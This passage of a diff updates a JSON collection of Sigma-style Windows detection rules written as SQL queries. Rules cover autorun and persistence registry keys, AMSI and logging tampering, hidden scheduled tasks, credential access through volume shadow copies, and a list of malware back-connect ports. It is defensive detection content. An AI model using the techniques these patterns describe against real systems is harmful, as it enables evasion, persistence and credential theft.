firewalls in order to bypass controls limiting network usage", - "author": "frack113", + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_defender_firewall.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Office Autorun Keys Modification", - "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", 
+ "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ "attack.persistence", "attack.t1547.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR 
TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_office.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. 
But this is not a common occurrence in an environment and should be investigated either way" + "Legitimate administrators removing applications (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", + "title": "Removal Of Index Value to Hide Schedule Task - Registry", + "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. 
Which effectively hides it from any tooling such as \"schtasks /query\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1562" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. 
Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1070", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_typed_paths.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Activate Suppression of Windows Security Center Notifications", - "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "title": "Removal Of SD Value to Hide Schedule Task - Registry", + "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", "status": "experimental", - "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", - "author": "frack113", + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. 
This technique is used by Tarrask malware", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" ], - "filename": "registry_set_suppress_defender_notifications.yml" + "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" }, { - "title": "System Scripts Autorun Keys Modification", - "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "title": "Removal of Potential COM Hijacking Registry Keys", + "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator 
sets up autorun keys for legitimate reason" + "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE ((EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\') OR (NewProcessName LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Everything.exe' ESCAPE '\\' AND 
TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" + "filename": "registry_delete_removal_com_hijacking_registry_key.yml" }, { - "title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "status": "test", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. 
This technique could be used by an attacker in order to disable AMSI inspection.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "registry_delete_removal_amsi_registry_key.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", - "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. 
This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "title": "Suspicious Typical Malware Back Connect Ports", + "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "status": "test", + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((NewProcessName LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE 
'172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_malware_backconnect_ports.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", - "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla 
Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "CurrentVersion Autorun Keys Modification", - "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", - "status": 
"experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate script" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 